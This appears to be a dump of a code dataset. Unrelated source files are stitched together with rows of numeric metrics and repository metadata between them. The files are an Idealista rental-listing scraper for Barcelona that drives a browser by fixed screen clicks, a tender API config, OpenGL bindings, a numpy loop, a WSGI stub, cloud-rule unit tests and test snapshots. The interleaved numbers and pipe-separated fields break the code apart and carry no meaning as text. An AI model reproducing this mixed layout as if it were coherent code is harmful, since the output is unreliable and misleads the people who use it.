Distritos = ['sarria-sant-gervasi/vallvidrera-el-tibidabo-i-les-planes','Gracia','Sants-Montjuic', 'ciutat-vella/la-barceloneta','ciutat-vella/el-raval', 'ciutat-vella/el-gotic', 'ciutat-vella/sant-pere-santa-caterina-i-la-ribera', 'sarria-sant-gervasi/sant-gervasi-galvany', 'sarria-sant-gervasi/el-putxet-i-el-farro', 'sarria-sant-gervasi/sant-gervasi-la-bonanova', 'sarria-sant-gervasi/Sarria', 'sarria-sant-gervasi/les-tres-torres', 'eixample/la-dreta-de-l-eixample', 'eixample/l-antiga-esquerra-de-l-eixample', 'eixample/la-nova-esquerra-de-l-eixample', 'eixample/la-sagrada-familia', 'eixample/sant-antoni', 'eixample/el-fort-pienc', 'horta-guinardo', 'les-corts', 'nou-barris', 'sant-andreu', 'sant-marti']
Distritos_links = ['https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/vallvidrera-el-tibidabo-i-les-planes/pagina-','https://www.idealista.com/alquiler-viviendas/barcelona/gracia/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sants-montjuic/pagina-','https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/la-barceloneta/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/el-raval/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/el-gotic/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/sant-pere-santa-caterina-i-la-ribera/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/sant-gervasi-galvany/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/el-putxet-i-el-farro/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/sant-gervasi-la-bonanova/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/sarria/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/les-tres-torres/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/la-dreta-de-l-eixample/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/l-antiga-esquerra-de-l-eixample/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/la-nova-esquerra-de-l-eixample/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/la-sagrada-familia/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/sant-antoni/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/el-fort-pienc/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/horta-guinardo/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/les-corts/pagina-', 
'https://www.idealista.com/alquiler-viviendas/barcelona/nou-barris/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sant-andreu/pagina-', 'https://www.idealista.com/alquiler-viviendas/barcelona/sant-marti/pagina-']
finurl = '.htm?ordenado-por=precios-asc'
Distrito_id = 0
raw_data = ''
status = 1
Excepcion_Distritos = ['sarria-sant-gervasi/','eixample/','ciutat-vella/']
#--------------------#
def auto_txt_save():
    """Append the scraped page text to a per-district .txt file.

    NOTE(review): relies on module-level globals — ``dis`` (current district
    index from the main loop) and ``raw_data`` (last clipboard contents).
    """
    with open(nameDistrito[dis]+'.txt','a+',encoding="utf-8") as f:
        f.write(str(raw_data) + '\n')
def tor_scrapper():
    """Grab the current page's markup through the browser dev tools.

    Opens dev tools (ctrl+shift+i), clicks through a right-click menu at
    fixed screen positions — presumably a "copy outer HTML"-style action,
    judging by the clipboard paste that follows (TODO confirm) — stores the
    clipboard text in the module-level ``raw_data``, saves it with
    auto_txt_save(), then closes dev tools.

    NOTE(review): the hard-coded pixel coordinates assume one specific
    screen resolution and window layout — verify before running.
    """
    global raw_data
    keyboard.press_and_release('ctrl+shift+i')
    gui.sleep(0.5)
    gui.click(1340,341)
    time.sleep(0.5)
    gui.click(button='right')
    time.sleep(0.5)
    gui.click(1399,577)
    time.sleep(0.5)
    gui.click(1679,586)
    time.sleep(0.5)
    # Whatever the menu action copied is now on the clipboard.
    raw_data = pyperclip.paste()
    auto_txt_save()
    keyboard.press_and_release('ctrl+shift+i')
# Main loop: for every district, page through the listing URLs until the
# site stops serving new pages (detected by a URL redirect), scraping each
# page with tor_scrapper().
for dis in range(len(Distritos)):
    indent=1    # page number appended to the district URL
    status = 1  # 1 = keep paging, 0 = district exhausted
    row = 0     # flag: the redirect-to-first-page case was already seen once
    while status == 1:
        url=Distritos_links[dis]+str(indent)+finurl
        pyperclip.copy(url)
        time.sleep(3)
        #gui.click(1018,1056)
        time.sleep(3)
        # Focus the browser and paste the URL into the address bar.
        gui.click(95,195)
        gui.click(492,65)
        keyboard.press_and_release('ctrl+v, enter')
        time.sleep(10)
        # Check whether the loaded URL is the same one we pasted (the site
        # redirects when the requested page number does not exist).
        gui.click(95,195) # click somewhere irrelevant to drop focus
        time.sleep(0.5)
        gui.click(818,67, button='right')
        time.sleep(0.5)
        gui.click(845,126)
        time.sleep(0.5)
        check_url = pyperclip.paste()
        if url == check_url:
            print('Coinciden')
            status = 1
        else:
            # Page 1 sometimes redirects to the bare district URL; accept
            # that once, otherwise the district has no more pages.
            lowDistrito = Distritos[dis]
            new_url = 'https://www.idealista.com/alquiler-viviendas/barcelona/'+ lowDistrito.lower() + '/?ordenado-por=precios-asc'
            if check_url == new_url and row ==0:
                print('Primera Página')
                status = 1
                row = 1
            else:
                status = 0
                print(Distritos[dis]+' finished')
                break
        indent+=1
        tor_scrapper()
| 62.601504
| 2,170
| 0.709945
| 1,080
| 8,326
| 5.45
| 0.178704
| 0.06524
| 0.138634
| 0.163099
| 0.743629
| 0.719504
| 0.692661
| 0.650527
| 0.634726
| 0.590214
| 0
| 0.013672
| 0.121547
| 8,326
| 132
| 2,171
| 63.075758
| 0.791086
| 0.02306
| 0
| 0.296875
| 0
| 0.25
| 0.616232
| 0.105215
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.015625
| 0
| 0.046875
| 0.046875
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8f029031a6ad7ac81e7cd64df4a52189314a0813
| 190
|
py
|
Python
|
examples/python/ApiWeb/ApiWeb/config.py
|
austender/etender-ocds-api
|
ea3bd2fc212b092ce7b39c0bef579b9deae2d01e
|
[
"MIT"
] | 3
|
2021-03-30T03:16:14.000Z
|
2021-09-01T05:24:52.000Z
|
examples/python/ApiWeb/ApiWeb/config.py
|
austender/etender-ocds-api
|
ea3bd2fc212b092ce7b39c0bef579b9deae2d01e
|
[
"MIT"
] | 8
|
2019-11-01T02:46:55.000Z
|
2022-03-29T12:07:29.000Z
|
examples/python/ApiWeb/ApiWeb/config.py
|
austender/etender-ocds-api
|
ea3bd2fc212b092ce7b39c0bef579b9deae2d01e
|
[
"MIT"
] | 3
|
2019-03-21T02:22:25.000Z
|
2022-03-10T10:42:24.000Z
|
class Config:
Url_Search_By_CnId = "https://ocdsapi-dev.tenders.gov.au/ocds/findById/"
Url_Search_By_DateRange = "https://ocdsapi-dev.tenders.gov.au/ocds/findByDates/contractStart/"
| 47.5
| 98
| 0.768421
| 27
| 190
| 5.185185
| 0.62963
| 0.128571
| 0.157143
| 0.314286
| 0.442857
| 0.442857
| 0.442857
| 0
| 0
| 0
| 0
| 0
| 0.084211
| 190
| 3
| 99
| 63.333333
| 0.804598
| 0
| 0
| 0
| 0
| 0
| 0.605263
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
8f04cfae6dd3c8e06ac17cac7eb1930e302fe85d
| 816
|
py
|
Python
|
OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/ARB/enhanced_layouts.py
|
JE-Chen/je_old_repo
|
a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5
|
[
"MIT"
] | null | null | null |
OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/ARB/enhanced_layouts.py
|
JE-Chen/je_old_repo
|
a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5
|
[
"MIT"
] | null | null | null |
OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/ARB/enhanced_layouts.py
|
JE-Chen/je_old_repo
|
a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5
|
[
"MIT"
] | null | null | null |
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_enhanced_layouts'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_ARB_enhanced_layouts',error_checker=_errors._error_checker)
GL_LOCATION_COMPONENT=_C('GL_LOCATION_COMPONENT',0x934A)
GL_TRANSFORM_FEEDBACK_BUFFER=_C('GL_TRANSFORM_FEEDBACK_BUFFER',0x8C8E)
GL_TRANSFORM_FEEDBACK_BUFFER_INDEX=_C('GL_TRANSFORM_FEEDBACK_BUFFER_INDEX',0x934B)
GL_TRANSFORM_FEEDBACK_BUFFER_STRIDE=_C('GL_TRANSFORM_FEEDBACK_BUFFER_STRIDE',0x934C)
| 42.947368
| 118
| 0.817402
| 119
| 816
| 5.168067
| 0.445378
| 0.107317
| 0.185366
| 0.243902
| 0.349594
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020492
| 0.102941
| 816
| 18
| 119
| 45.333333
| 0.819672
| 0.122549
| 0
| 0
| 1
| 0
| 0.237681
| 0.237681
| 0
| 0
| 0.034783
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.461538
| 0.076923
| 0.615385
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8f3dfcdfc3831b819b222c387259f8b9bc6ea6bc
| 290
|
py
|
Python
|
TensorFlow1.py
|
agbruneau/AGBPython
|
202e963b466dbee01139fdb26ace03343acdc9ca
|
[
"Apache-2.0"
] | null | null | null |
TensorFlow1.py
|
agbruneau/AGBPython
|
202e963b466dbee01139fdb26ace03343acdc9ca
|
[
"Apache-2.0"
] | null | null | null |
TensorFlow1.py
|
agbruneau/AGBPython
|
202e963b466dbee01139fdb26ace03343acdc9ca
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np

# Adjacency matrix of a 4-node directed graph, plus an output matrix that
# will additionally mark two-step paths that pass through node 0.
edges = np.matrix('0 0 0 1; 0 0 1 0; 1 0 0 0; 0 0 1 0')
mat1 = np.matrix('0 0 0 0; 0 0 0 0; 0 0 0 0; 0 0 0 0')

for row in range(0, 4):
    # A direct edge row->0 combined with an edge 0->col means col is
    # reachable from row via node 0.
    via_node0 = edges[row, 0] == 1
    for col in range(0, 4):
        direct = edges[row, col] == 1
        if direct or (via_node0 and edges[0, col] == 1):
            mat1[row, col] = 1

print(mat1)
| 24.166667
| 71
| 0.5
| 75
| 290
| 1.933333
| 0.253333
| 0.303448
| 0.372414
| 0.413793
| 0.303448
| 0.110345
| 0.110345
| 0.110345
| 0.110345
| 0.110345
| 0
| 0.230769
| 0.327586
| 290
| 11
| 72
| 26.363636
| 0.512821
| 0
| 0
| 0
| 0
| 0
| 0.234483
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0.125
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8f457344f7c13bd4e7e8efaf303ef86fcafeadd6
| 199
|
py
|
Python
|
tests/test_post_train_step.py
|
hankyul2/PostImageClassification
|
3a044f58f50a845d24a18225cee5aabf1af593ba
|
[
"MIT"
] | null | null | null |
tests/test_post_train_step.py
|
hankyul2/PostImageClassification
|
3a044f58f50a845d24a18225cee5aabf1af593ba
|
[
"MIT"
] | 2
|
2021-04-07T07:53:34.000Z
|
2021-04-07T07:57:10.000Z
|
tests/test_post_train_step.py
|
hankyul2/PostImageClassification
|
3a044f58f50a845d24a18225cee5aabf1af593ba
|
[
"MIT"
] | null | null | null |
from src.post_train_step import PostTrain
def test_train():
    """train_fn() must report success (truthy result)."""
    assert PostTrain().train_fn()
def test_post_train():
    """post_train() accuracy must meet the recorded baseline of 0.8662."""
    assert PostTrain().post_train() >= 0.8662
| 16.583333
| 41
| 0.688442
| 28
| 199
| 4.642857
| 0.5
| 0.207692
| 0.276923
| 0.369231
| 0.430769
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031447
| 0.201005
| 199
| 11
| 42
| 18.090909
| 0.786164
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 1
| 0.285714
| false
| 0
| 0.142857
| 0
| 0.428571
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8f5c671feb52927b8679a256b582d93bdfabdc1f
| 45
|
py
|
Python
|
Bot/3_Algorithm/Logic/_Dollar_Cost_Averaging.py
|
ReedGraff/High-Low
|
c8ba0339d7818e344cacf9a73a83d24dc539c2ca
|
[
"MIT"
] | 1
|
2022-01-06T05:50:53.000Z
|
2022-01-06T05:50:53.000Z
|
Bot/3_Algorithm/Logic/_Dollar_Cost_Averaging.py
|
ReedGraff/High-Low
|
c8ba0339d7818e344cacf9a73a83d24dc539c2ca
|
[
"MIT"
] | null | null | null |
Bot/3_Algorithm/Logic/_Dollar_Cost_Averaging.py
|
ReedGraff/High-Low
|
c8ba0339d7818e344cacf9a73a83d24dc539c2ca
|
[
"MIT"
] | null | null | null |
def Dollar_Cost_Averaging(self):
    """Dollar-cost-averaging strategy stub.

    NOTE(review): no averaging logic is implemented yet — this always
    returns 0.
    """
    return 0
| 22.5
| 32
| 0.777778
| 7
| 45
| 4.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026316
| 0.155556
| 45
| 2
| 33
| 22.5
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 5
|
8f72e05aea2257fe19c04f05967166916f2c95b5
| 151
|
wsgi
|
Python
|
icanhaz/Centosimage/icanhaz.wsgi
|
technicalflow/docker
|
d5ba1ab3ad15823cbe6890754ca516a1a31eefeb
|
[
"MIT"
] | null | null | null |
icanhaz/Centosimage/icanhaz.wsgi
|
technicalflow/docker
|
d5ba1ab3ad15823cbe6890754ca516a1a31eefeb
|
[
"MIT"
] | 1
|
2021-12-07T18:48:59.000Z
|
2021-12-07T18:48:59.000Z
|
icanhaz/Centosimage/icanhaz.wsgi
|
technicalflow/docker
|
d5ba1ab3ad15823cbe6890754ca516a1a31eefeb
|
[
"MIT"
] | 1
|
2022-01-18T09:35:33.000Z
|
2022-01-18T09:35:33.000Z
|
import sys
import logging
# Route WSGI log output to stderr so it lands in the web server's error log.
logging.basicConfig(stream=sys.stderr)
# Make the application package importable from its install location.
sys.path.insert(0, '/var/www/html/ip/icanhaz')
# mod_wsgi looks for a module-level callable named `application`.
from icanhaz import app as application
| 25.166667
| 46
| 0.801325
| 24
| 151
| 5.041667
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007246
| 0.086093
| 151
| 5
| 47
| 30.2
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0.15894
| 0.15894
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8f7a1b941746bc52e11d16a0fa451f8ac58d1f6a
| 4,121
|
py
|
Python
|
tests/knowledge/rules/aws/non_context_aware/encryption_enforcement_rules/encrypt_at_rest/test_ensure_neptune_cluster_encrypted_at_rest_rule_with_customer_managed_cmk.py
|
my-devops-info/cloudrail-knowledge
|
b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e
|
[
"MIT"
] | null | null | null |
tests/knowledge/rules/aws/non_context_aware/encryption_enforcement_rules/encrypt_at_rest/test_ensure_neptune_cluster_encrypted_at_rest_rule_with_customer_managed_cmk.py
|
my-devops-info/cloudrail-knowledge
|
b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e
|
[
"MIT"
] | null | null | null |
tests/knowledge/rules/aws/non_context_aware/encryption_enforcement_rules/encrypt_at_rest/test_ensure_neptune_cluster_encrypted_at_rest_rule_with_customer_managed_cmk.py
|
my-devops-info/cloudrail-knowledge
|
b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e
|
[
"MIT"
] | null | null | null |
import unittest
from cloudrail.dev_tools.rule_test_utils import create_empty_entity
from cloudrail.knowledge.context.aws.kms.kms_key import KmsKey
from cloudrail.knowledge.context.aws.kms.kms_key_manager import KeyManager
from cloudrail.knowledge.context.aws.neptune.neptune_cluster import NeptuneCluster
from cloudrail.knowledge.context.aws.aws_environment_context import AwsEnvironmentContext
from cloudrail.knowledge.context.terraform_state import TerraformState
from cloudrail.knowledge.rules.aws.non_context_aware.encryption_enforcement_rules.\
encrypt_at_rest.ensure_neptune_cluster_encrypted_at_rest_rule_with_customer_managed_cmk import \
EnsureNeptuneClusterEncryptedAtRestWithCustomerManagedCmkRule
from cloudrail.knowledge.rules.base_rule import RuleResultType
class TestEnsureNeptuneClusterEncryptedAtRestWithCustomerManagedCmkRule(unittest.TestCase):
    """Tests for the Neptune 'encrypted at rest with customer-managed CMK' rule.

    The four tests previously duplicated the same six-line arrange block;
    it is extracted into private helpers so each test states only what
    varies (resource newness, KMS key manager) and the expected outcome.
    """

    def setUp(self):
        self.rule = EnsureNeptuneClusterEncryptedAtRestWithCustomerManagedCmkRule()

    def _make_cluster(self, is_new=True, key_manager=None):
        """Build an encrypted NeptuneCluster entity; key_manager=None leaves kms_data unset."""
        neptune_cluster: NeptuneCluster = create_empty_entity(NeptuneCluster)
        terraform_state = create_empty_entity(TerraformState)
        neptune_cluster.terraform_state = terraform_state
        neptune_cluster.terraform_state.is_new = is_new
        neptune_cluster.encrypted_at_rest = True
        if key_manager is not None:
            neptune_cluster.kms_data = KmsKey(key_id='key', arn='arn', key_manager=key_manager,
                                              region='us-east-1', account='111111111')
        return neptune_cluster

    def _run_rule(self, neptune_cluster):
        """Run the rule against a context containing only the given cluster."""
        context = AwsEnvironmentContext(neptune_clusters=[neptune_cluster])
        return self.rule.run(context, {})

    def test_non_car_neptune_cluster_encrypt_at_rest_with_customer_managed_cmk_fail(self):
        # AWS-managed key on a new resource -> rule fails with one issue.
        result = self._run_rule(self._make_cluster(key_manager=KeyManager.AWS))
        self.assertEqual(RuleResultType.FAILED, result.status)
        self.assertEqual(1, len(result.issues))

    def test_non_car_neptune_cluster_encrypt_at_rest_with_customer_managed_cmk_pass(self):
        # Customer-managed key on a new resource -> rule passes.
        result = self._run_rule(self._make_cluster(key_manager=KeyManager.CUSTOMER))
        self.assertEqual(RuleResultType.SUCCESS, result.status)
        self.assertEqual(0, len(result.issues))

    def test_non_car_neptune_cluster_encrypt_at_rest_with_customer_managed__not_new_resource__cmk_pass(self):
        # Existing (not new) resource is out of scope -> rule passes even with an AWS key.
        result = self._run_rule(self._make_cluster(is_new=False, key_manager=KeyManager.AWS))
        self.assertEqual(RuleResultType.SUCCESS, result.status)
        self.assertEqual(0, len(result.issues))

    def test_non_car_neptune_cluster_encrypt_at_rest_with_customer_managed__no_kms_data__cmk_fail(self):
        # No KMS data at all on a new resource -> rule fails with one issue.
        result = self._run_rule(self._make_cluster())
        self.assertEqual(RuleResultType.FAILED, result.status)
        self.assertEqual(1, len(result.issues))
| 53.519481
| 140
| 0.766562
| 465
| 4,121
| 6.434409
| 0.178495
| 0.135695
| 0.051136
| 0.074866
| 0.766377
| 0.735294
| 0.735294
| 0.735294
| 0.707888
| 0.707888
| 0
| 0.00981
| 0.158942
| 4,121
| 76
| 141
| 54.223684
| 0.853433
| 0.018199
| 0
| 0.649123
| 0
| 0
| 0.017853
| 0
| 0
| 0
| 0
| 0
| 0.140351
| 1
| 0.087719
| false
| 0.035088
| 0.157895
| 0
| 0.263158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
56c841bfeca7d17c0c687b155ca31694f4940870
| 79
|
py
|
Python
|
script/commons/__init__.py
|
ybkuroki/selenium-e2e-sample
|
18a7e92d9b338104ac8b418a6987cadfd1c12d39
|
[
"MIT"
] | 1
|
2021-09-08T20:05:40.000Z
|
2021-09-08T20:05:40.000Z
|
script/commons/__init__.py
|
ybkuroki/selenium-e2e-sample
|
18a7e92d9b338104ac8b418a6987cadfd1c12d39
|
[
"MIT"
] | null | null | null |
script/commons/__init__.py
|
ybkuroki/selenium-e2e-sample
|
18a7e92d9b338104ac8b418a6987cadfd1c12d39
|
[
"MIT"
] | null | null | null |
from .stream_yaml import StreamYaml
from .resource_loader import ResourceLoader
| 39.5
| 43
| 0.886076
| 10
| 79
| 6.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088608
| 79
| 2
| 43
| 39.5
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
56d6133b0763cad627bffa7320e5ac2e310de3f1
| 26
|
py
|
Python
|
soda/core/soda/execution/telemetry.py
|
duyet/soda-core
|
92a52e0d7c1e88624d0637123cfcb2610af6d112
|
[
"Apache-2.0"
] | 4
|
2022-03-23T02:43:42.000Z
|
2022-03-31T15:20:54.000Z
|
soda/core/soda/execution/telemetry.py
|
duyet/soda-core
|
92a52e0d7c1e88624d0637123cfcb2610af6d112
|
[
"Apache-2.0"
] | 543
|
2022-03-22T09:02:17.000Z
|
2022-03-31T16:29:41.000Z
|
soda/core/soda/execution/telemetry.py
|
duyet/soda-core
|
92a52e0d7c1e88624d0637123cfcb2610af6d112
|
[
"Apache-2.0"
] | 1
|
2022-03-27T03:37:55.000Z
|
2022-03-27T03:37:55.000Z
|
class Telemetry:
    """Placeholder for telemetry collection; no behavior implemented yet."""
    pass
| 8.666667
| 16
| 0.692308
| 3
| 26
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.269231
| 26
| 2
| 17
| 13
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
710a5f3013dcbd02c8ceda5b65ef5d0194668901
| 1,164
|
py
|
Python
|
ixian_docker/tests/modules/bower/snapshots/snap_test_config.py
|
kreneskyp/ixian-docker
|
ce7a6cee2f961b8446dc3d9429a809ab5a235467
|
[
"Apache-2.0"
] | null | null | null |
ixian_docker/tests/modules/bower/snapshots/snap_test_config.py
|
kreneskyp/ixian-docker
|
ce7a6cee2f961b8446dc3d9429a809ab5a235467
|
[
"Apache-2.0"
] | null | null | null |
ixian_docker/tests/modules/bower/snapshots/snap_test_config.py
|
kreneskyp/ixian-docker
|
ce7a6cee2f961b8446dc3d9429a809ab5a235467
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from pysnap import Snapshot
snapshots = Snapshot()
snapshots['TestBowerConfig.test_read[ARGS] 1'] = [
'--config.interactive=false',
'--allow-root'
]
snapshots['TestBowerConfig.test_read[BIN] 1'] = '/srv/unittests/node_modules/.bin/bower'
snapshots['TestBowerConfig.test_read[COMPONENTS_DIR] 1'] = '/srv/unittests/bower_components'
snapshots['TestBowerConfig.test_read[CONFIG_FILE] 1'] = 'bower.json'
snapshots['TestBowerConfig.test_read[CONFIG_FILE_PATH] 1'] = '/srv/unittests/project/bower.json'
snapshots['TestBowerConfig.test_read[DOCKERFILE] 1'] = 'Dockerfile.bower'
snapshots['TestBowerConfig.test_read[IMAGE] 1'] = 'docker.io/library/unittests:bower-27a022922e73344c316d657ad99710548617005cf8886fb16139237a21bf4d4f'
snapshots['TestBowerConfig.test_read[IMAGE_TAG] 1'] = 'bower-27a022922e73344c316d657ad99710548617005cf8886fb16139237a21bf4d4f'
snapshots['TestBowerConfig.test_read[MODULE_DIR] 1'] = '/opt/ixian_docker/ixian_docker/modules/bower'
snapshots['TestBowerConfig.test_read[REPOSITORY] 1'] = 'docker.io/library/unittests'
| 36.375
| 150
| 0.787801
| 129
| 1,164
| 6.914729
| 0.387597
| 0.269058
| 0.313901
| 0.358744
| 0.568386
| 0.376682
| 0
| 0
| 0
| 0
| 0
| 0.102873
| 0.073024
| 1,164
| 31
| 151
| 37.548387
| 0.723818
| 0.053265
| 0
| 0
| 0
| 0
| 0.716106
| 0.66333
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
713b38f89f89fcc7384a3684e9a19ccbd3668fd6
| 55
|
py
|
Python
|
src/pyfreedompro/__init__.py
|
stefano055415/pyfreedompro
|
efba39f8b97c1ece914652c256a6f7cdb6d052f0
|
[
"MIT"
] | null | null | null |
src/pyfreedompro/__init__.py
|
stefano055415/pyfreedompro
|
efba39f8b97c1ece914652c256a6f7cdb6d052f0
|
[
"MIT"
] | 1
|
2021-03-16T17:04:35.000Z
|
2021-03-17T12:50:19.000Z
|
src/pyfreedompro/__init__.py
|
stefano055415/pyfreedompro
|
efba39f8b97c1ece914652c256a6f7cdb6d052f0
|
[
"MIT"
] | 1
|
2021-03-16T15:25:40.000Z
|
2021-03-16T15:25:40.000Z
|
from .functions import get_list, get_states, put_state
| 27.5
| 54
| 0.836364
| 9
| 55
| 4.777778
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109091
| 55
| 1
| 55
| 55
| 0.877551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
